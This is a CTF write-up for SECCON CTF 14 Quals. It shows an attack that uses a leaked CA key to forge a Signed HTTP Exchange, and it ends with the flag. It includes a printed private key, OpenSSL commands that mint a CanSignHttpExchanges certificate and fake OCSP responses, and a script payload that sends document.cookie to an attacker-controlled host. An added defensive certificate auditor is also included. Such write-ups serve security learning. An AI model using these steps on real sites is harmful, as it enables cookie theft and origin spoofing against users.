
SECCON CTF 14 Quals

It was finals week, so I solved one challenge and bailed.

broken-challenge

The cookie is scoped to the hack.the.planet.seccon domain.

The /hint route hands out the certificate's private key:

-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIDXSM3v5wDSRra/TS/InNmXoVWqm4W/HsWyJ5qzqk0lUoAoGCCqGSM49
AwEHoUQDQgAElm1pmadguVhutPv6LdLuQke8b3iTpaGBIdmc5ta9/WLs1GtFV2K5
wGUkCtk/c9u1e64FKrqqHva6JMAJFafgOw==
-----END EC PRIVATE KEY-----

Use SXG (Signed HTTP Exchanges): the bot visits a URL we control, but the browser treats the page's origin as https://hack.the.planet.seccon.

First save the key and certificate from the challenge as ca.key and ca.crt, then run:

#!/bin/bash

# Prepare the OpenSSL extension config file
# (1.3.6.1.4.1.11129.2.1.22 is the CanSignHttpExchanges extension)
cat <<EOF > sxg_ext.cnf
basicConstraints = CA:FALSE
keyUsage = digitalSignature
subjectAltName = DNS:hack.the.planet.seccon
1.3.6.1.4.1.11129.2.1.22 = ASN1:NULL
EOF

# Generate a fresh P-256 key and a CSR for the target hostname
openssl req -new -newkey ec:<(openssl ecparam -name prime256v1) -nodes \
    -keyout leaf.key -out leaf.csr \
    -subj "/CN=hack.the.planet.seccon/O=Seccon/C=JP"

# Sign the leaf certificate with the CA provided by the challenge
openssl x509 -req -days 90 -in leaf.csr \
    -CA ca.crt -CAkey ca.key -CAcreateserial \
    -out leaf.crt -extfile sxg_ext.cnf

# Run a throwaway OCSP responder whose index file lists the leaf as valid ("V")
openssl ocsp -index <(printf "V\t350101000000Z\t\t%s\tunknown\t/CN=hack.the.planet.seccon\n" "$(openssl x509 -in leaf.crt -serial -noout | cut -d= -f2)") \
    -port 8888 -rsigner ca.crt -rkey ca.key -CA ca.crt -text &
OCSP_PID=$!
sleep 1

# Fetch the OCSP response as DER (needed for the cert-chain CBOR later)
openssl ocsp -issuer ca.crt -cert leaf.crt \
    -url http://localhost:8888 -respout ocsp.der -noverify

kill $OCSP_PID
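What makes the minted leaf dangerous is the combination of the CanSignHttpExchanges extension (the `1.3.6.1.4.1.11129.2.1.22 = ASN1:NULL` line in sxg_ext.cnf) with a SAN for the victim hostname: any certificate chaining to the leaked key can carry both. The following is an added example, not part of the original writeup, showing how a defender can audit a DER certificate for exactly those two properties with a stdlib-only DER walker. It feeds itself a constructed extensions block rather than a real certificate, so it runs offline; a real input would come from `openssl x509 -in leaf.crt -outform DER`.

```python
"""Audit a DER-encoded certificate for the CanSignHttpExchanges extension and
its DNS SANs, using only the standard library (a minimal DER walker)."""

CAN_SIGN_HTTP_EXCHANGES_OID = "1.3.6.1.4.1.11129.2.1.22"  # extension from sxg_ext.cnf
SUBJECT_ALT_NAME_OID = "2.5.29.17"


def encode_oid(dotted: str) -> bytes:
    """DER-encode a dotted OID: first two arcs packed into one byte, rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))  # continuation bit on all but last byte
            arc >>= 7
        out.extend(chunk)
    return bytes(out)


def decode_oid(body: bytes) -> str:
    """Inverse of encode_oid (valid for first byte < 80, i.e. arcs 0.x and 1.x and 2.x<40)."""
    arcs = [body[0] // 40, body[0] % 40]
    value = 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def tlv(tag: int, body: bytes) -> bytes:
    """DER-encode one tag/length/value triple (definite-length form)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + body


def read_tlv(data: bytes, pos: int):
    """Return (tag, value_start, value_end) for the DER element at pos."""
    tag = data[pos]
    length = data[pos + 1]
    pos += 2
    if length & 0x80:  # long form: the next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def children(data: bytes, start: int, end: int):
    """Iterate over the sibling elements packed between start and end."""
    pos = start
    while pos < end:
        tag, vs, ve = read_tlv(data, pos)
        yield tag, vs, ve
        pos = ve


def iter_extensions(data: bytes, start: int = 0, end=None):
    """Yield (oid, critical, extnValue) for each X.509 Extension found.

    Instead of parsing the full Certificate grammar, descend into every constructed
    element and treat any SEQUENCE { OID, [BOOLEAN], OCTET STRING } as an Extension;
    in practice that shape only occurs inside the extensions list.
    """
    if end is None:
        end = len(data)
    for tag, vs, ve in children(data, start, end):
        if not tag & 0x20:  # primitive element (BIT STRING, OCTET STRING...): skip
            continue
        kids = list(children(data, vs, ve))
        if (tag == 0x30 and 2 <= len(kids) <= 3
                and kids[0][0] == 0x06 and kids[-1][0] == 0x04):
            oid = decode_oid(data[kids[0][1]:kids[0][2]])
            critical = len(kids) == 3 and data[kids[1][1]] != 0
            yield oid, critical, data[kids[-1][1]:kids[-1][2]]
        else:
            yield from iter_extensions(data, vs, ve)


def audit_certificate(der: bytes) -> dict:
    """Report whether the cert may sign exchanges and which DNS names it covers."""
    report = {"can_sign_http_exchanges": False, "dns_names": []}
    for oid, _critical, value in iter_extensions(der):
        if oid == CAN_SIGN_HTTP_EXCHANGES_OID:
            # The extension value is an ASN.1 NULL (05 00); anything else is malformed.
            report["can_sign_http_exchanges"] = value == b"\x05\x00"
        elif oid == SUBJECT_ALT_NAME_OID:
            _, vs, ve = read_tlv(value, 0)  # GeneralNames ::= SEQUENCE OF GeneralName
            for tag, s, e in children(value, vs, ve):
                if tag == 0x82:  # dNSName [2] IA5String
                    report["dns_names"].append(value[s:e].decode("ascii"))
    return report


def build_sample(with_can_sign: bool) -> bytes:
    """Constructed test input (not a real certificate): the [3] extensions block a
    leaf like leaf.crt would carry, wrapped in an outer SEQUENCE."""
    exts = tlv(0x30, tlv(0x06, encode_oid(SUBJECT_ALT_NAME_OID))
               + tlv(0x04, tlv(0x30, tlv(0x82, b"hack.the.planet.seccon"))))
    if with_can_sign:
        exts += tlv(0x30, tlv(0x06, encode_oid(CAN_SIGN_HTTP_EXCHANGES_OID))
                    + tlv(0x04, tlv(0x05, b"")))
    return tlv(0x30, tlv(0xA3, tlv(0x30, exts)))


if __name__ == "__main__":
    print(audit_certificate(build_sample(True)))
    print(audit_certificate(build_sample(False)))
```

The auditor only covers the two properties the attack above relies on; a full SXG certificate check would also verify the chain back to its issuer and the 90-day maximum validity Chrome imposes on CanSignHttpExchanges certificates (which is why the script signs with `-days 90`).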

Generate the SXG with Google's official webpackage toolset:

go install github.com/WICG/webpackage/go/signedexchange/cmd/...@latest
gen-certurl -pem leaf.crt -ocsp ocsp.der > cert.cbor

echo '<script>location.href="https://<vps_domain>/?flag="+document.cookie</script>' > index.html

gen-signedexchange \
  -uri https://hack.the.planet.seccon/ \
  -content index.html \
  -certificate leaf.crt \
  -privateKey leaf.key \
  -certUrl https://<vps_domain>/cert.cbor \
  -validityUrl https://hack.the.planet.seccon/resource.validity.1511128384 \
  -expire 168h \
  -o exploit.sxg

Host the sxg and the cbor on a server; the only thing to watch is the Content-Type of each:

sxg:application/signed-exchange;v=b3
cbor:application/cert-chain+cbor

SECCON{congratz_you_hacked_the_planet_521ce0597cdcd1e3}

License: CC BY 4.0